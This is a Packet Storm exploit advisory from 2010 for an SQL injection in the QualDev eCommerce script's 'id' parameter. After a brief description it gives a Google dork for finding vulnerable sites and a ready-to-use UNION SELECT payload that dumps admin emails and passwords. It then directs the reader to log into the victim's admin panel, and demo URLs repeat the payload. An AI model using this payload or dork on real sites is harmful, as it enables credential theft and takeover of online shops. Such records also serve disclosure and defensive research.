QualDev eCommerce SQL Injection

2010-12-16T00:00:00
ID PACKETSTORM:96742
Type packetstorm
Reporter ErrNick
Modified 2010-12-16T00:00:00

Description

                                        
                                            `====================================================  
QualDev eCommerce script SQL injection vulnerability  
====================================================  
  
  
# Exploit Title: QualDev eCommerce script SQL injection vulnerability  
# Vendor: http://www.qualdev.com  
# Date: 15.12.2010  
# Version: all version  
# Category:: webapps  
# Google dork: inurl:"index.php?file=allfile"  
# Tested on: FreeBSD 7.1  
# Author: ErrNick  
# Site: XakNet.ru, forum.xaknet.ru  
# Contact: errnick[at]xaknet[dot]ru  
# Greatz 2 all memberz of XakNet team ( X1mk0~, Saint, baltazar, SHYLLER,  
Kronus, mst && others)  
  
# Intro:  
  
- A parameter is not properly sanitised before being used in a SQL query.  
- Input passed to "id" parameter is not properly  
- sanitised before being used in a SQL query. This can be  
- exploited to manipulate SQL queries by injecting  
- arbitrary SQL code.  
  
# Exploit:  
  
  
index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin  
  
logining with admin email && password there  
http://victim/adminpanel/  
  
#Demo:  
  
-  
http://www.site.com/index.php?file=allfile&id=-40+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin  
-  
http://www.site.com/index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin  
-  
http://www.site.com/index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin  
  
  
Vizit us at http://xaknet.ru  
  
  
  
  
`